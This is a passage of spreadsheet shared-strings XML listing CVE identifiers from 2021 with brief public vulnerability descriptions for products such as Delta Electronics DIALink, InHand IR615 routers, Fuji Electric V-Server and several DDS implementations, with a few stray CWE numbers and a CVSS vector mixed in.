    <t>CVE-2021-38366</t>
  </si>
  <si>
    <t>Sitecore through 10.1, when Update Center is enabled, allows remote authenticated users to upload arbitrary files and achieve remote code execution by visiting an uploaded .aspx file at an admin/Packages URL.</t>
  </si>
  <si>
    <t>CVE-2021-3837</t>
  </si>
  <si>
    <t>openwhyd is vulnerable to Improper Authorization</t>
  </si>
  <si>
    <t>CVE-2021-38370</t>
  </si>
  <si>
    <t>In Alpine before 2.25, untagged responses from an IMAP server are accepted before STARTTLS.</t>
  </si>
  <si>
    <t>CVE-2021-38371</t>
  </si>
  <si>
    <t>The STARTTLS feature in Exim through 4.94.2 allows response injection (buffering) during MTA SMTP sending.</t>
  </si>
  <si>
    <t>CVE-2021-38372</t>
  </si>
  <si>
    <t>In KDE Trojita 0.7, man-in-the-middle attackers can create new folders because untagged responses from an IMAP server are accepted before STARTTLS.</t>
  </si>
  <si>
    <t>CVE-2021-38373</t>
  </si>
  <si>
    <t>In KDE KMail 19.12.3 (aka 5.13.3), the SMTP STARTTLS option is not honored (and cleartext messages are sent) unless "Server requires authentication" is checked.</t>
  </si>
  <si>
    <t>CVE-2021-38374</t>
  </si>
  <si>
    <t>OX App Suite through through 7.10.5 allows XSS via a crafted snippet that has an app loader reference within an app loader URL.</t>
  </si>
  <si>
    <t>CVE-2021-38375</t>
  </si>
  <si>
    <t>OX App Suite through 7.10.5 allows XSS via the alt attribute of an IMG element in a truncated e-mail message.</t>
  </si>
  <si>
    <t>CVE-2021-38376</t>
  </si>
  <si>
    <t>OX App Suite through 7.10.5 has Incorrect Access Control for retrieval of session information via the rampup action of the login API call.</t>
  </si>
  <si>
    <t>CVE-2021-38377</t>
  </si>
  <si>
    <t>OX App Suite through 7.10.5 allows XSS via JavaScript code in an anchor HTML comment within truncated e-mail, because there is a predictable UUID with HTML transformation results.</t>
  </si>
  <si>
    <t>CVE-2021-38378</t>
  </si>
  <si>
    <t>OX App Suite 7.10.5 allows Information Exposure because a caching mechanism can caused a Modified By response to show a person's name.</t>
  </si>
  <si>
    <t>CVE-2021-38379</t>
  </si>
  <si>
    <t>The Hub in CFEngine Enterprise 3.6.7 through 3.18.0 has Insecure Permissions that allow local Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-38380</t>
  </si>
  <si>
    <t>Live555 through 1.08 mishandles huge requests for the same MP3 stream, leading to recursion and s stack-based buffer over-read. An attacker can leverage this to launch a DoS attack.</t>
  </si>
  <si>
    <t>CVE-2021-38381</t>
  </si>
  <si>
    <t>Live555 through 1.08 does not handle MPEG-1 or 2 files properly. Sending two successive RTSP SETUP commands for the same track causes a Use-After-Free and daemon crash.</t>
  </si>
  <si>
    <t>CVE-2021-38382</t>
  </si>
  <si>
    <t>Live555 through 1.08 does not handle Matroska and Ogg files properly. Sending two successive RTSP SETUP commands for the same track causes a Use-After-Free and daemon crash.</t>
  </si>
  <si>
    <t>CVE-2021-38383</t>
  </si>
  <si>
    <t>OwnTone (aka owntone-server) through 28.1 has a use-after-free in net_bind() in misc.c.</t>
  </si>
  <si>
    <t>CVE-2021-38384</t>
  </si>
  <si>
    <t>Serverless Offline 8.0.0 returns a 403 HTTP status code for a route that has a trailing / character, which might cause a developer to implement incorrect access control, because the actual behavior within the Amazon AWS environment is a 200 HTTP status code (i.e., possibly greater than expected permissions).</t>
  </si>
  <si>
    <t>CVE-2021-38385</t>
  </si>
  <si>
    <t>Tor before 0.3.5.16, 0.4.5.10, and 0.4.6.7 mishandles the relationship between batch-signature verification and single-signature verification, leading to a remote assertion failure, aka TROVE-2021-007.</t>
  </si>
  <si>
    <t>CVE-2021-38386</t>
  </si>
  <si>
    <t>In Contiki 3.0, a buffer overflow in the Telnet service allows remote attackers to cause a denial of service because the ls command is mishandled when a directory has many files with long names.</t>
  </si>
  <si>
    <t>CVE-2021-38387</t>
  </si>
  <si>
    <t>In Contiki 3.0, a Telnet server that silently quits (before disconnection with clients) leads to connected clients entering an infinite loop and waiting forever, which may cause excessive CPU consumption.</t>
  </si>
  <si>
    <t>CVE-2021-38388</t>
  </si>
  <si>
    <t>Central Dogma allows privilege escalation with mirroring to the internal dogma repository that has a file managing the authorization of the project.</t>
  </si>
  <si>
    <t>CVE-2021-38389</t>
  </si>
  <si>
    <t>Advantech WebAccess versions 9.02 and prior are vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute code.</t>
  </si>
  <si>
    <t>CVE-2021-3839</t>
  </si>
  <si>
    <t>A flaw was found in the vhost library in DPDK. Function vhost_user_set_inflight_fd() does not validate `msg-&gt;payload.inflight.num_queues`, possibly causing out-of-bounds memory read/write. Any software using DPDK vhost library may crash as a result of this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-38390</t>
  </si>
  <si>
    <t>A Blind SQL injection vulnerability exists in the /DataHandler/HandlerEnergyType.ashx endpoint of Delta Electronics DIAEnergie Version 1.7.5 and prior. The application does not properly validate the user-controlled value supplied through the parameter egyid before using it as part of an SQL query. A remote, unauthenticated attacker can exploit this issue to execute arbitrary code in the context of NT SERVICE\MSSQLSERVER.</t>
  </si>
  <si>
    <t>CVE-2021-38391</t>
  </si>
  <si>
    <t>A Blind SQL injection vulnerability exists in the /DataHandler/AM/AM_Handler.ashx endpoint of Delta Electronics DIAEnergie Version 1.7.5 and prior. The application does not properly validate the user-controlled value supplied through the parameter type before using it as part of an SQL query. A remote, unauthenticated attacker can exploit this issue to execute arbitrary code in the context of NT SERVICE\MSSQLSERVER.</t>
  </si>
  <si>
    <t>CVE-2021-38392</t>
  </si>
  <si>
    <t>A skilled attacker with physical access to the affected device can gain access to the hard disk drive of the device to change the telemetry region and could use this setting to interrogate or program an implantable device in any region in the world.</t>
  </si>
  <si>
    <t>CVE-2021-38393</t>
  </si>
  <si>
    <t>A Blind SQL injection vulnerability exists in the /DataHandler/HandlerAlarmGroup.ashx endpoint of Delta Electronics DIAEnergie Version 1.7.5 and prior. The application does not properly validate the user-controlled value supplied through the parameter agid before using it as part of an SQL query. A remote, unauthenticated attacker can exploit this issue to execute arbitrary code in the context of NT SERVICE\MSSQLSERVER.</t>
  </si>
  <si>
    <t>CVE-2021-38394</t>
  </si>
  <si>
    <t>An attacker with physical access to the device can extract the binary that checks for the hardware key and reverse engineer it, which could be used to create a physical duplicate of a valid hardware key. The hardware key allows access to special settings when inserted.</t>
  </si>
  <si>
    <t>1278</t>
  </si>
  <si>
    <t>CVE-2021-38395</t>
  </si>
  <si>
    <t>Honeywell Experion PKS C200, C200E, C300, and ACE controllers are vulnerable to improper neutralization of special elements in output, which may allow an attacker to remotely execute arbitrary code and cause a denial-of-service condition.</t>
  </si>
  <si>
    <t>CVE-2021-38396</t>
  </si>
  <si>
    <t>The programmer installation utility does not perform a cryptographic authenticity or integrity checks of the software on the flash drive. An attacker could leverage this weakness to install unauthorized software using a specially crafted USB.</t>
  </si>
  <si>
    <t>CVE-2021-38397</t>
  </si>
  <si>
    <t>Honeywell Experion PKS C200, C200E, C300, and ACE controllers are vulnerable to unrestricted file uploads, which may allow an attacker to remotely execute arbitrary code and cause a denial-of-service condition.</t>
  </si>
  <si>
    <t>CVE-2021-38398</t>
  </si>
  <si>
    <t>The affected device uses off-the-shelf software components that contain unpatched vulnerabilities. A malicious attacker with physical access to the affected device could exploit these vulnerabilities.</t>
  </si>
  <si>
    <t>1329</t>
  </si>
  <si>
    <t>CVE-2021-38399</t>
  </si>
  <si>
    <t>Honeywell Experion PKS C200, C200E, C300, and ACE controllers are vulnerable to relative path traversal, which may allow an attacker access to unauthorized files and directories.</t>
  </si>
  <si>
    <t>CVE-2021-3840</t>
  </si>
  <si>
    <t>A dependency confusion vulnerability was reported in the Antilles open-source software prior to version 1.0.1 that could allow for remote code execution during installation due to a package listed in requirements.txt not existing in the public package index (PyPi). MITRE classifies this weakness as an Uncontrolled Search Path Element (CWE-427) in which a private package dependency may be replaced by an unauthorized package of the same name published to a well-known public repository such as PyPi. The configuration has been updated to only install components built by Antilles, removing all other public package indexes. Additionally, the antilles-tools dependency has been published to PyPi.</t>
  </si>
  <si>
    <t>CVE-2021-38400</t>
  </si>
  <si>
    <t>An attacker with physical access to Boston Scientific Zoom Latitude Model 3120 can remove the hard disk drive or create a specially crafted USB to extract the password hash for brute force reverse engineering of the system password.</t>
  </si>
  <si>
    <t>CVE-2021-38401</t>
  </si>
  <si>
    <t>Fuji Electric V-Server Lite and Tellus Lite V-Simulator prior to v4.0.12.0 is vulnerable to an untrusted pointer dereference, which may allow an attacker to execute arbitrary code and cause the application to crash.</t>
  </si>
  <si>
    <t>CVE-2021-38402</t>
  </si>
  <si>
    <t>Delta Electronic DOPSoft 2 (Version 2.00.07 and prior) lacks proper validation of user-supplied data when parsing specific project files. This could lead to a stack-based buffer overflow while trying to copy to a buffer during font string handling. An attacker could leverage this vulnerability to execute code in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-38403</t>
  </si>
  <si>
    <t>Delta Electronics DIALink versions 1.2.4.0 and prior is vulnerable to cross-site scripting because an authenticated attacker can inject arbitrary JavaScript code into the parameter supplier of the API maintenance, which may allow an attacker to remotely execute code.</t>
  </si>
  <si>
    <t>CVE-2021-38404</t>
  </si>
  <si>
    <t>Delta Electronic DOPSoft 2 (Version 2.00.07 and prior) lacks proper validation of user-supplied data when parsing specific project files. This could result in a heap-based buffer overflow. An attacker could leverage this vulnerability to execute code in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-38406</t>
  </si>
  <si>
    <t>Delta Electronic DOPSoft 2 (Version 2.00.07 and prior) lacks proper validation of user-supplied data when parsing specific project files. This could result in multiple out-of-bounds write instances. An attacker could leverage this vulnerability to execute code in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-38407</t>
  </si>
  <si>
    <t>Delta Electronics DIALink versions 1.2.4.0 and prior is vulnerable to cross-site scripting because an authenticated attacker can inject arbitrary JavaScript code into the parameter name of the API devices, which may allow an attacker to remotely execute code.</t>
  </si>
  <si>
    <t>CVE-2021-38408</t>
  </si>
  <si>
    <t>A stack-based buffer overflow vulnerability in Advantech WebAccess Versions 9.02 and prior caused by a lack of proper validation of the length of user-supplied data may allow remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-38409</t>
  </si>
  <si>
    <t>Fuji Electric V-Server Lite and Tellus Lite V-Simulator prior to v4.0.12.0 is vulnerable to an access of uninitialized pointer, which may allow an attacker read from or write to unexpected memory locations, leading to a denial-of-service.</t>
  </si>
  <si>
    <t>CVE-2021-38410</t>
  </si>
  <si>
    <t>AVEVA Software Platform Common Services (PCS) Portal versions 4.5.2, 4.5.1, 4.5.0, and 4.4.6 are vulnerable to DLL hijacking through an uncontrolled search path element, which may allow an attacker control to one or more locations in the search path.</t>
  </si>
  <si>
    <t>CVE-2021-38411</t>
  </si>
  <si>
    <t>Delta Electronics DIALink versions 1.2.4.0 and prior is vulnerable to cross-site scripting because an authenticated attacker can inject arbitrary JavaScript code into the parameter deviceName of the API modbusWriter-Reader, which may allow an attacker to remotely execute code.</t>
  </si>
  <si>
    <t>CVE-2021-38412</t>
  </si>
  <si>
    <t>Properly formatted POST requests to multiple resources on the HTTP and HTTPS web servers of the Digi PortServer TS 16 Rack device do not require authentication or authentication tokens. This vulnerability could allow an attacker to enable the SNMP service and manipulate the community strings to achieve further control in.</t>
  </si>
  <si>
    <t>CVE-2021-38413</t>
  </si>
  <si>
    <t>Fuji Electric V-Server Lite and Tellus Lite V-Simulator prior to v4.0.12.0 is vulnerable to a stack-based buffer overflow, which may allow an attacker to achieve code execution.</t>
  </si>
  <si>
    <t>CVE-2021-38415</t>
  </si>
  <si>
    <t>Fuji Electric V-Server Lite and Tellus Lite V-Simulator prior to v4.0.12.0 is vulnerable a heap-based buffer overflow when parsing a specially crafted project file, which may allow an attacker to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-38416</t>
  </si>
  <si>
    <t>Delta Electronics DIALink versions 1.2.4.0 and prior insecurely loads libraries, which may allow an attacker to use DLL hijacking and takeover the system where the software is installed.</t>
  </si>
  <si>
    <t>CVE-2021-38417</t>
  </si>
  <si>
    <t>VISAM VBASE version 11.6.0.6 is vulnerable to improper access control via the web-remote endpoint, which may allow an unauthenticated user viewing access to folders and files in the directory listing.</t>
  </si>
  <si>
    <t>CVE-2021-38418</t>
  </si>
  <si>
    <t>Delta Electronics DIALink versions 1.2.4.0 and prior runs by default on HTTP, which may allow an attacker to be positioned between the traffic and perform a machine-in-the-middle attack to access information without authorization.</t>
  </si>
  <si>
    <t>CVE-2021-38419</t>
  </si>
  <si>
    <t>Fuji Electric V-Server Lite and Tellus Lite V-Simulator prior to v4.0.12.0 is vulnerable to an out-of-bounds write, which can result in data corruption, a system crash, or code execution.</t>
  </si>
  <si>
    <t>CVE-2021-3842</t>
  </si>
  <si>
    <t>CVE-2021-38420</t>
  </si>
  <si>
    <t>Delta Electronics DIALink versions 1.2.4.0 and prior default permissions give extensive permissions to low-privileged user accounts, which may allow an attacker to modify the installation directory and upload malicious files.</t>
  </si>
  <si>
    <t>CVE-2021-38421</t>
  </si>
  <si>
    <t>Fuji Electric V-Server Lite and Tellus Lite V-Simulator prior to v4.0.12.0 is vulnerable to an out-of-bounds read, which may allow an attacker to read sensitive information from other memory locations or cause a crash.</t>
  </si>
  <si>
    <t>CVE-2021-38422</t>
  </si>
  <si>
    <t>Delta Electronics DIALink versions 1.2.4.0 and prior stores sensitive information in cleartext, which may allow an attacker to have extensive access to the application directory and escalate privileges.</t>
  </si>
  <si>
    <t>CVE-2021-38423</t>
  </si>
  <si>
    <t>All versions of GurumDDS improperly calculate the size to be used when allocating the buffer, which may result in a buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-38424</t>
  </si>
  <si>
    <t>The tag interface of Delta Electronics DIALink versions 1.2.4.0 and prior is vulnerable to an attacker injecting formulas into the tag data. Those formulas may then be executed when it is opened with a spreadsheet application.</t>
  </si>
  <si>
    <t>CVE-2021-38425</t>
  </si>
  <si>
    <t>eProsima Fast DDS versions prior to 2.4.0 (#2269) are susceptible to exploitation when an attacker sends a specially crafted packet to flood a target device with unwanted traffic, which may result in a denial-of-service condition and information exposure.</t>
  </si>
  <si>
    <t>CVE-2021-38426</t>
  </si>
  <si>
    <t>FATEK Automation WinProladder versions 3.30 and prior lacks proper validation of user-supplied data when parsing project files, which could result in an out-of-bounds write. An attacker could leverage this vulnerability to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-38427</t>
  </si>
  <si>
    <t>RTI Connext DDS Professional and Connext DDS Secure Versions 4.2.x to 6.1.0 are vulnerable to a stack-based buffer overflow, which may allow a local attacker to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-38428</t>
  </si>
  <si>
    <t>Delta Electronics DIALink versions 1.2.4.0 and prior is vulnerable to cross-site scripting because an authenticated attacker can inject arbitrary JavaScript code into the parameter name of the API schedule, which may allow an attacker to remotely execute code.</t>
  </si>
  <si>
    <t>CVE-2021-38429</t>
  </si>
  <si>
    <t>OCI OpenDDS versions prior to 3.18.1 are vulnerable when an attacker sends a specially crafted packet to flood target devices with unwanted traffic, which may result in a denial-of-service condition and information exposure.</t>
  </si>
  <si>
    <t>CVE-2021-3843</t>
  </si>
  <si>
    <t>A potential vulnerability in the SMI function to access EEPROM in some ThinkPad models may allow an attacker with local access and elevated privileges to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-38430</t>
  </si>
  <si>
    <t>FATEK Automation WinProladder versions 3.30 and prior proper validation of user-supplied data when parsing project files, which could result in a stack-based buffer overflow. An attacker could leverage this vulnerability to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-38431</t>
  </si>
  <si>
    <t>An authenticated user using Advantech WebAccess SCADA in versions 9.0.3 and prior can use API functions to disclose project names and paths from other users.</t>
  </si>
  <si>
    <t>CVE-2021-38432</t>
  </si>
  <si>
    <t>FATEK Automation Communication Server Versions 1.13 and prior lacks proper validation of user-supplied data, which could result in a stack-based buffer overflow condition and allow an attacker to remotely execute code.</t>
  </si>
  <si>
    <t>CVE-2021-38433</t>
  </si>
  <si>
    <t>RTI Connext DDS Professional and Connext DDS Secure Versions 4.2x to 6.1.0 vulnerable to a stack-based buffer overflow, which may allow a local attacker to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-38434</t>
  </si>
  <si>
    <t>FATEK Automation WinProladder versions 3.30 and prior lacks proper validation of user-supplied data when parsing project files, which could result in an unexpected sign extension. An attacker could leverage this vulnerability to execute arbitrary code.</t>
  </si>
  <si>
    <t>194</t>
  </si>
  <si>
    <t>CVE-2021-38435</t>
  </si>
  <si>
    <t>RTI Connext DDS Professional and Connext DDS Secure Versions 4.2x to 6.1.0 not correctly calculate the size when allocating the buffer, which may result in a buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-38436</t>
  </si>
  <si>
    <t>FATEK Automation WinProladder versions 3.30 and prior lacks proper validation of user-supplied data when parsing project files, which could result in a memory-corruption condition. An attacker could leverage this vulnerability to execute arbitrary code in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-38438</t>
  </si>
  <si>
    <t>A use after free vulnerability in FATEK Automation WinProladder versions 3.30 and prior may be exploited when a valid user opens a malformed project file, which may allow arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-38439</t>
  </si>
  <si>
    <t>All versions of GurumDDS are vulnerable to heap-based buffer overflow, which may cause a denial-of-service condition or remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-38440</t>
  </si>
  <si>
    <t>FATEK Automation WinProladder versions 3.30 and prior is vulnerable to an out-of-bounds read, which may allow an attacker to read unauthorized information.</t>
  </si>
  <si>
    <t>CVE-2021-38441</t>
  </si>
  <si>
    <t>Eclipse CycloneDDS versions prior to 0.8.0 are vulnerable to a write-what-where condition, which may allow an attacker to write arbitrary values in the XML parser.</t>
  </si>
  <si>
    <t>CVE-2021-38442</t>
  </si>
  <si>
    <t>FATEK Automation WinProladder versions 3.30 and prior lacks proper validation of user-supplied data when parsing project files, which could result in a heap-corruption condition. An attacker could leverage this vulnerability to execute code in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-38443</t>
  </si>
  <si>
    <t>Eclipse CycloneDDS versions prior to 0.8.0 improperly handle invalid structures, which may allow an attacker to write arbitrary values in the XML parser.</t>
  </si>
  <si>
    <t>CVE-2021-38445</t>
  </si>
  <si>
    <t>OCI OpenDDS versions prior to 3.18.1 do not handle a length parameter consistent with the actual length of the associated data, which may allow an attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-38447</t>
  </si>
  <si>
    <t>OCI OpenDDS versions prior to 3.18.1 are vulnerable when an attacker sends a specially crafted packet to flood target devices with unwanted traffic, which may result in a denial-of-service condition.</t>
  </si>
  <si>
    <t>CVE-2021-38448</t>
  </si>
  <si>
    <t>The affected controllers do not properly sanitize the input containing code syntax. As a result, an attacker could craft code to alter the intended controller flow of the software.</t>
  </si>
  <si>
    <t>CVE-2021-38449</t>
  </si>
  <si>
    <t>Some API functions permit by-design writing or copying data into a given buffer. Since the client controls these parameters, an attacker could rewrite the memory in any location of the affected product.</t>
  </si>
  <si>
    <t>CVE-2021-3845</t>
  </si>
  <si>
    <t>ws-scrcpy is vulnerable to External Control of File Name or Path</t>
  </si>
  <si>
    <t>CVE-2021-38450</t>
  </si>
  <si>
    <t>CVE-2021-38451</t>
  </si>
  <si>
    <t>The affected product’s proprietary protocol CSC allows for calling numerous function codes. In order to call those function codes, the user must supply parameters. There is no sanitation on the value of the offset, which allows the client to specify any offset and read out-of-bounds data.</t>
  </si>
  <si>
    <t>CVE-2021-38452</t>
  </si>
  <si>
    <t>A path traversal vulnerability in the Moxa MXview Network Management software Versions 3.x to 3.2.2 may allow an attacker to create or overwrite critical files used to execute code, such as programs or libraries.</t>
  </si>
  <si>
    <t>CVE-2021-38453</t>
  </si>
  <si>
    <t>Some API functions allow interaction with the registry, which includes reading values as well as data modification.</t>
  </si>
  <si>
    <t>15</t>
  </si>
  <si>
    <t>CVE-2021-38454</t>
  </si>
  <si>
    <t>CVE-2021-38455</t>
  </si>
  <si>
    <t>The affected product’s OS Service does not verify any given parameter. A user can supply any type of parameter that will be passed to inner calls without checking the type of the parameter or the value.</t>
  </si>
  <si>
    <t>CVE-2021-38456</t>
  </si>
  <si>
    <t>A use of hard-coded password vulnerability in the Moxa MXview Network Management software Versions 3.x to 3.2.2 may allow an attacker to gain access through accounts using default passwords</t>
  </si>
  <si>
    <t>CVE-2021-38457</t>
  </si>
  <si>
    <t>The server permits communication without any authentication procedure, allowing the attacker to initiate a session with the server without providing any form of authentication.</t>
  </si>
  <si>
    <t>CVE-2021-38458</t>
  </si>
  <si>
    <t>CVE-2021-38459</t>
  </si>
  <si>
    <t>The data of a network capture of the initial handshake phase can be used to authenticate at a SYSDBA level. If a specific .exe is not restarted often, it is possible to access the needed handshake packets between admin/client connections. Using the SYSDBA permission, an attacker can change user passwords or delete the database.</t>
  </si>
  <si>
    <t>CVE-2021-3846</t>
  </si>
  <si>
    <t>firefly-iii is vulnerable to Unrestricted Upload of File with Dangerous Type</t>
  </si>
  <si>
    <t>CVE-2021-38460</t>
  </si>
  <si>
    <t>CVE-2021-38461</t>
  </si>
  <si>
    <t>The affected product uses a hard-coded blowfish key for encryption/decryption processes. The key can be easily extracted from binaries.</t>
  </si>
  <si>
    <t>CVE-2021-38462</t>
  </si>
  <si>
    <t>InHand Networks IR615 Router's Versions 2.3.0.r4724 and 2.3.0.r4870 does not enforce an efficient password policy. This may allow an attacker with obtained user credentials to enumerate passwords and impersonate other application users and perform operations on their behalf.</t>
  </si>
  <si>
    <t>CVE-2021-38463</t>
  </si>
  <si>
    <t>The affected product does not properly control the allocation of resources. A user may be able to allocate unlimited memory buffers using API functions.</t>
  </si>
  <si>
    <t>CVE-2021-38464</t>
  </si>
  <si>
    <t>InHand Networks IR615 Router's Versions 2.3.0.r4724 and 2.3.0.r4870 have inadequate encryption strength, which may allow an attacker to intercept the communication and steal sensitive information or hijack the session.</t>
  </si>
  <si>
    <t>CVE-2021-38465</t>
  </si>
  <si>
    <t>The webinstaller is a Golang web server executable that enables the generation of an Auvesy image agent. Resource consumption can be achieved by generating large amounts of installations, which are then saved without limitation in the temp folder of the webinstaller executable.</t>
  </si>
  <si>
    <t>CVE-2021-38466</t>
  </si>
  <si>
    <t>InHand Networks IR615 Router's Versions 2.3.0.r4724 and 2.3.0.r4870 do not perform sufficient input validation on client requests from the help page. This may allow an attacker to perform a reflected cross-site scripting attack, which could allow an attacker to run code on behalf of the client browser.</t>
  </si>
  <si>
    <t>CVE-2021-38467</t>
  </si>
  <si>
    <t>A specific function code receives a raw pointer supplied by the user and deallocates this pointer. The user can then control what memory regions will be freed and cause use-after-free condition.</t>
  </si>
  <si>
    <t>CVE-2021-38468</t>
  </si>
  <si>
    <t>InHand Networks IR615 Router's Versions 2.3.0.r4724 and 2.3.0.r4870 are vulnerable to stored cross-scripting, which may allow an attacker to hijack sessions of users connected to the system.</t>
  </si>
  <si>
    <t>CVE-2021-38469</t>
  </si>
  <si>
    <t>Many of the services used by the affected product do not specify full paths for the DLLs they are loading. An attacker can exploit the uncontrolled search path by implanting their own DLL near the affected product’s binaries, thus hijacking the loaded DLL.</t>
  </si>
  <si>
    <t>CVE-2021-3847</t>
  </si>
  <si>
    <t>An unauthorized access to the execution of the setuid file with capabilities flaw in the Linux kernel OverlayFS subsystem was found in the way user copying a capable file from a nosuid mount into another mount. A local user could use this flaw to escalate their privileges on the system.</t>
  </si>
  <si>
    <t>CVE-2021-38470</t>
  </si>
  <si>
    <t>InHand Networks IR615 Router's Versions 2.3.0.r4724 and 2.3.0.r4870 are vulnerable to an attacker using a ping tool to inject commands into the device. This may allow the attacker to remotely run commands on behalf of the device.</t>
  </si>
  <si>
    <t>CVE-2021-38471</t>
  </si>
  <si>
    <t>There are multiple API function codes that permit data writing to any file, which may allow an attacker to modify existing files or create new files.</t>
  </si>
  <si>
    <t>CVE-2021-38472</t>
  </si>
  <si>
    <t>InHand Networks IR615 Router's Versions 2.3.0.r4724 and 2.3.0.r4870 management portal does not contain an X-FRAME-OPTIONS header, which an attacker may take advantage of by sending a link to an administrator that frames the router’s management portal and could lure the administrator to perform changes.</t>
  </si>
  <si>
    <t>CVE-2021-38473</t>
  </si>
  <si>
    <t>The affected product’s code base doesn’t properly control arguments for specific functions, which could lead to a stack overflow.</t>
  </si>
  <si>
    <t>CVE-2021-38474</t>
  </si>
  <si>
    <t>InHand Networks IR615 Router's Versions 2.3.0.r4724 and 2.3.0.r4870 have has no account lockout policy configured for the login page of the product. This may allow an attacker to execute a brute-force password attack with no time limitation and without harming the normal operation of the user. This could allow an attacker to gain valid credentials for the product interface.</t>
  </si>
  <si>
    <t>CVE-2021-38475</t>
  </si>
  <si>
    <t>The database connection to the server is performed by calling a specific API, which could allow an unprivileged user to gain SYSDBA permissions.</t>
  </si>
  <si>
    <t>CVE-2021-38476</t>
  </si>
  <si>
    <t>InHand Networks IR615 Router's Versions 2.3.0.r4724 and 2.3.0.r4870 authentication process response indicates and validates the existence of a username. This may allow an attacker to enumerate different user accounts.</t>
  </si>
  <si>
    <t>CVE-2021-38477</t>
  </si>
  <si>
    <t>There are multiple API function codes that permit reading and writing data to or from files and directories, which could lead to the manipulation and/or the deletion of files.</t>
  </si>
  <si>
    <t>CVE-2021-38478</t>
  </si>
  <si>
    <t>InHand Networks IR615 Router's Versions 2.3.0.r4724 and 2.3.0.r4870 are vulnerable to an attacker using a traceroute tool to inject commands into the device. This may allow the attacker to remotely run commands on behalf of the device.</t>
  </si>
  <si>
    <t>CVE-2021-38479</t>
  </si>
  <si>
    <t>Many API function codes receive raw pointers remotely from the user and trust these pointers as valid in-bound memory regions. An attacker can manipulate API functions by writing arbitrary data into the resolved address of a raw pointer.</t>
  </si>
  <si>
    <t>CVE-2021-3848</t>
  </si>
  <si>
    <t>An arbitrary file creation by privilege escalation vulnerability in Trend Micro Apex One, Apex One as a Service, Worry-Free Business Security 10.0 SP1, and Worry-Free Business Security Services could allow a local attacker to create an arbitrary file with higher privileges that could lead to a denial-of-service (DoS) on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-38480</t>
  </si>
  <si>
    <t>InHand Networks IR615 Router's Versions 2.3.0.r4724 and 2.3.0.r4870 are vulnerable to cross-site request forgery when unauthorized commands are submitted from a user the web application trusts. This may allow an attacker to remotely perform actions on the router’s management portal, such as making configuration changes, changing administrator credentials, and running system commands on the router.</t>
  </si>
  <si>
    <t>CVE-2021-38481</t>
  </si>
  <si>
    <t>The scheduler service running on a specific TCP port enables the user to start and stop jobs. There is no sanitation of the supplied JOB ID provided to the function. An attacker may send a malicious payload that can enable the user to execute another SQL expression by sending a specific string.</t>
  </si>
  <si>
    <t>CVE-2021-38482</t>
  </si>
  <si>
    <t>InHand Networks IR615 Router's Versions 2.3.0.r4724 and 2.3.0.r4870 website used to control the router is vulnerable to stored cross-site scripting, which may allow an attacker to hijack sessions of users connected to the system.</t>
  </si>
  <si>
    <t>CVE-2021-38483</t>
  </si>
  <si>
    <t>The affected product is vulnerable to misconfigured binaries, allowing users on the target PC with SYSTEM level privileges access to overwrite the binary and modify files to gain privilege escalation.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2021-38484</t>
  </si>
  <si>
    <t>InHand Networks IR615 Router's Versions 2.3.0.r4724 and 2.3.0.r4870 do not have a filter or signature check to detect or prevent an upload of malicious files to the server, which may allow an attacker, acting as an administrator, to upload malicious files. This could result in cross-site scripting, deletion of system files, and remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-38485</t>
  </si>
  <si>
    <t>The affected product is vulnerable to improper input validation in the restore file. This enables an attacker to provide malicious config files to replace any file on disk.</t>
  </si>
  <si>
    <t>CVE-2021-38486</t>
  </si>
  <si>
    <t>InHand Networks IR615 Router's Versions 2.3.0.r4724 and 2.3.0.r4870 cloud portal allows for self-registration of the affected product without any requirements to create an account, which may allow an attacker to have full control over the product and execute code within the internal network to which the product is connected.</t>
  </si>
  <si>
    <t>CVE-2021-38487</t>
  </si>
  <si>
    <t>RTI Connext DDS Professional, Connext DDS Secure versions 4.2x to 6.1.0, and Connext DDS Micro versions 2.4 and later are vulnerable when an attacker sends a specially crafted packet to flood target devices with unwanted traffic. This may result in a denial-of-service condition and information exposure.</t>
  </si>
  <si>
    <t>CVE-2021-38488</t>
  </si>
  <si>
    <t>Delta Electronics DIALink versions 1.2.4.0 and prior is vulnerable to cross-site scripting because an authenticated attacker can inject arbitrary JavaScript code into the parameter comment of the API events, which may allow an attacker to remotely execute code.</t>
  </si>
  <si>
    <t>CVE-2021-3849</t>
  </si>
  <si>
    <t>An authentication bypass vulnerability was discovered in the web interface of the Lenovo Fan Power Controller2 (FPC2) and Lenovo System Management Module (SMM) firmware that could allow an unauthenticated attacker to execute commands on the SMM and FPC2. SMM2 is not affected.</t>
  </si>
  <si>
    <t>CVE-2021-38490</t>
  </si>
  <si>
    <t>Altova MobileTogether Server before 7.3 SP1 allows XML exponential entity expansion, a different vulnerability than CVE-2021-37425.</t>
  </si>
  <si>
    <t>CVE-2021-38491</t>
  </si>
  <si>
    <t>Mixed-content checks were unable to analyze opaque origins which led to some mixed content being loaded. This vulnerability affects Firefox &lt; 92.</t>
  </si>
  <si>
    <t>CVE-2021-38492</t>
  </si>
  <si>
